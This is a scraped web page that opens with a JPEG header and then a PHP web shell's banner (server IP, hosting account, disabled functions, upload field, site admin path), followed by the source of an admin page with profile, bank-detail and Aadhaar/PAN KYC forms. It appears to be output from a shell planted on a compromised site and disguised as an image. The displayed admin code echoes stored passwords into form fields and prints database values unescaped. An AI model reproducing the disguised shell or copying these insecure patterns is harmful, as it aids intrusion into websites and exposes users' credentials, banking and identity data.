���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/jeevikagaumaa.in/public_html/admin/ |
Upload File : |
<!-- The Modal1 --> <div class="modal fade" id="myModal1"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">User Profile</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body"> <form action="update-profile.php" method="POST" enctype="multipart/form-data"> <table class="table table-sm"> <tr> <td>Userid* </td> <td> <input type="text" name="userid" value="<?= $r['userid']; ?>" class="form-control form-control-sm" readonly> </td> </tr> <tr> <td>sponsor id* </td> <td><input type="text" name="sponcerid" class="form-control form-control-sm" value="<?= $r['sponcerid']; ?>" placeholder="sponcerid" required></td> </tr> <tr> <td>Name* </td> <td> <input type="text" name="name" class="form-control form-control-sm" value="<?= $r['name']; ?>" placeholder="Name" required> </td> </tr> <tr> <td>Joining Date* </td> <td><?= $r['join_date']; ?></td> </tr> <tr> <td>Mobile* </td> <td><input type="text" maxlength="10" class="form-control form-control-sm" name="phone" value="<?= $r['phone']; ?>" placeholder="Phone" required></td> </tr> <tr> <td>Email* </td> <td><input type="email" name="email" class="form-control form-control-sm" value="<?= $r['email']; ?>" placeholder="email" required></td> </tr> <tr> <td>Password* </td> <td><input type="password" name="password" class="form-control form-control-sm" value="<?= $r['password']; ?>" placeholder="password" required></td> </tr> <tr> <td>Image </td> <td><input type="file" name="files" accept=".jpg, .jpeg" class="form-control form-control-sm" value="<?= $r['files']; ?>" ></td> </tr> </table> <div class="mt-2" align="right"> <input type="submit" class="btn btn-primary btn-sm" name="user_profile" value="Update"> </div> </form> </div> </div> </div> </div> <!-- The Modal2 --> <div class="modal fade" id="myModal2"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">Bank Details</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body"> <form method="post" action="update-profile" enctype="multipart/form-data"> <table class="table bank_details table-sm" id="bank_details"> <tr> <td>Userid* </td> <td> <input type="text" name="userid" value="<?= $r['userid']; ?>" class="form-control form-control-sm" readonly> </td> </tr> <tr> <td>A/c Number* </td> <td><input type="text" name="ac_num" class="form-control form-control-sm" value="<?= $r['ac_num']; ?>" placeholder="Account Number" required></td> </tr> <tr> <td>IFSC Code* </td> <td><input type="text" name="ifsc" maxlength="11" class="form-control form-control-sm" value="<?= $r['ifsc']; ?>" placeholder="IFSC Code" required></td> </tr> <tr> <td>Bank Name* </td> <td><input type="text" name="bank_name" class="form-control form-control-sm" value="<?= $r['bank_name']; ?>" placeholder="Bank Name" required></td> </tr> </table> <div class="mt-2" align="right"> <input type="submit" class="btn btn-primary btn-sm" name="bank_details" value="Update"> </div> </form> </div> </div> </div> </div> <!-- The Modal3 --> <div class="modal fade" id="myModal3"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">KYC Details</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body"> <form method="post" action="update-profile" enctype="multipart/form-data"> <table class="table table-bordered bank_details table-sm"> <tr> <td>Userid </td> <td><input type="text" name="userid" value="<?= $r['userid']; ?>" class="form-control form-control-sm" readonly></td> </tr> <tr> <td>Aadhar Number* </td> <td><input type="text" name="aadhar_num" maxlength="12" class="form-control form-control-sm" value="<?= $r['aadhar_num']; ?>" placeholder="Aadhar Number" ></td> </tr> <tr> <td>Aadhar Image* </td> <td> <input type="file" name="aadhar_img" accept=".jpg, .jpeg" class="form-control form-control-sm" > </td> </tr> <tr> <td>PAN Number* </td> <td><input type="text" name="pan_num" maxlength="10" class="form-control form-control-sm" value="<?= $r['pan_num']; ?>" placeholder="PAN Number" ></td> </tr> <tr> <td>PAN Image* </td> <td> <input type="file" name="pan_img" accept=".jpg, .jpeg" class="form-control form-control-sm" > </td> </tr> </table> <div class="mt-2" align="right"> <input type="submit" class="btn btn-primary btn-sm" name="KYC_details" value="Update"> </div> </form> </div> </div> </div> </div> <!-- The image1 --> <div class="modal fade" id="img1"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">User Profile</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body text-center"> <img height="300" width="80%" src="./assets/img/<?php echo $r['files']; ?>"> </div> </div> </div> </div> <!-- The image2 --> <div class="modal fade" id="img2"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">Bank Passbook / Cancelled Cheque</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body text-center"> <img height="300" width="100%" src="./assets/img/<?= $r['passbook']; ?>"> </div> </div> </div> </div> <!-- The image3 --> <div class="modal fade" id="img3"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">Aadhar Card</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body text-center"> <img height="300" width="100%" src="./assets/img/<?= $r['aadhar_img']; ?>"> </div> </div> </div> </div> <!-- The image4 --> <div class="modal fade" id="img4"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h6 class="modal-title">PAN Card</h6> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal body --> <div class="modal-body text-center"> <img height="300" width="100%" src="./assets/img/<?= $r['pan_img']; ?>"> </div> </div> </div> </div>